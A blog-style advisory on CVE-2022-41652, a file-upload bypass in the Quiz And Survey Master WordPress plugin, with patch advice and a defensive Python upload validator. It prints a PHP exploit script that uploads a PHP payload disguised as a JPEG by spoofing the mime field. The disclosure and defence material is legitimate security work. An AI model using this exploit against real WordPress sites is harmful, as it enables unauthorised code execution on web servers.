The Quiz And Survey Master (QSM) plugin is a popular choice among WordPress users for creating quizzes and surveys on their websites. However, a bypass vulnerability was recently discovered in QSM plugin versions <= 7.3.10 and assigned the identifier CVE-2022-41652. In this post, we cover the details of this vulnerability, provide a code snippet that demonstrates the exploit, and link to the official references and patch. By the end of this article, you should have a better understanding of the issue and know how to protect your WordPress website from it.

What is CVE-2022-41652?

The vulnerability exists because the QSM plugin does not properly validate user input when handling file uploads in quiz and survey forms. This allows an attacker to upload malicious files to the server, bypassing the plugin's security checks and potentially causing harm to the website or its visitors.

The exploit triggers a logic flaw in the plugin code responsible for validating file uploads: a request whose fields are crafted to pass the plugin's checks still results in a malicious file being stored on the server.

Let's take a look at a sample code snippet that demonstrates the exploit:

<?php
// Exploit for CVE-2022-41652
// Bypass vulnerability in Quiz and Survey Master plugin <= 7.3.10

// Payload: <?php echo "Hacked!"; ?>
// Save as payload.jpg

$url = "http://example.com/wp-admin/admin-ajax.php";
$post_data = array(
    "action" => "qsm_upload_user_file",
    "nonce" => "292d5c916272a77fde72156a05b80964",
    "question_id" => "1",
    "mlw_quiz_id" => "1",
    "mlw_quiz_pass" => "xyz",
    "mime" => "image/png_.jpg"
);

$file_data = array(
    "file" => new \CurlFile("payload.jpg", "image/jpeg", "payload.jpg"),
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($post_data, $file_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);

echo "Exploit executed, check server for uploaded payload!";
?>

In the above code snippet, the attacker crafts the POST request to upload a file named payload.jpg, which is actually a PHP script (a simple backdoor) disguised as an image file. The script contains the following payload:

<?php echo "Hacked!"; ?>

If the server executes the uploaded file as PHP, it outputs "Hacked!" to whoever requests it, demonstrating that the upload leads to code execution on the web server.
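As an added defensive illustration (not code from this page or from the QSM project), the following Python validator shows the checks that defeat this class of bypass: it never trusts the client-supplied mime field for the decision, allows exactly one extension from an allowlist, verifies the file's magic bytes, and rejects any content carrying a PHP open tag. The function name, allowlists and sample inputs are this example's own assumptions; the logic is language-neutral and maps directly onto a PHP upload handler.

```python
import re

# Allowed extensions mapped to the magic bytes a genuine file of that type starts with.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# Declared mime types we accept; only a sanity check, never the basis for the decision.
ALLOWED_MIME = {"image/jpeg", "image/png", "image/gif"}
# PHP open tags. Matching only "<?php" and "<?=" avoids false positives on the
# "<?xpacket" XMP header that legitimate JPEGs may carry.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_upload(filename: str, declared_mime: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for a candidate upload.

    Every check operates on what the server can observe itself (name and bytes);
    the client-declared mime string is only cross-checked, so a value such as
    "image/png_.jpg" or a faked "image/jpeg" cannot make a PHP file acceptable.
    """
    parts = filename.lower().split(".")
    # Exactly one extension, and it must be allowlisted (blocks "shell.php.jpg").
    if len(parts) != 2 or parts[1] not in MAGIC:
        return False, "extension not allowed"
    ext = parts[1]
    # Declared mime must be a plain, allowlisted media type token.
    if declared_mime not in ALLOWED_MIME:
        return False, "declared mime not allowed"
    # Content must actually look like the claimed image type.
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # Reject image/PHP polyglots: valid header followed by a PHP payload.
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample: the request from the write-up above.
    print(validate_upload("payload.jpg", "image/png_.jpg", b'<?php echo "Hacked!"; ?>'))
    # Constructed sample: a minimal genuine JPEG header.
    print(validate_upload("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF"))
```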

References

1. Official CVE-2022-41652 disclosure: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41652
2. QSM Plugin on WordPress: https://wordpress.org/plugins/quiz-master-next/
3. Official release notes of the patch: https://github.com/QuizandSurveyMaster/quiz_master_next/blob/master/readme.txt

How to Mitigate CVE-2022-41652

The security issue has been addressed in QSM plugin version 7.3.11. Therefore, to protect your WordPress website from this vulnerability, it is highly recommended to update the Quiz And Survey Master plugin to the latest version. Here's how you can do it:

1. In your WordPress admin dashboard, go to the 'Plugins' section and find the Quiz And Survey Master plugin.

2. Click on the 'Update Now' link, which should be visible next to the plugin's name if an update is available.

Conclusion

By staying updated with the latest security patches and keeping an eye on the official channels for information and updates, you can keep your WordPress website safe from vulnerabilities like CVE-2022-41652. Be sure to follow best practices for securing your WordPress installation, including using strong passwords, keeping all plugins and themes updated, and regularly monitoring your website for suspicious activity.

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/21/2022 17:10:00 UTC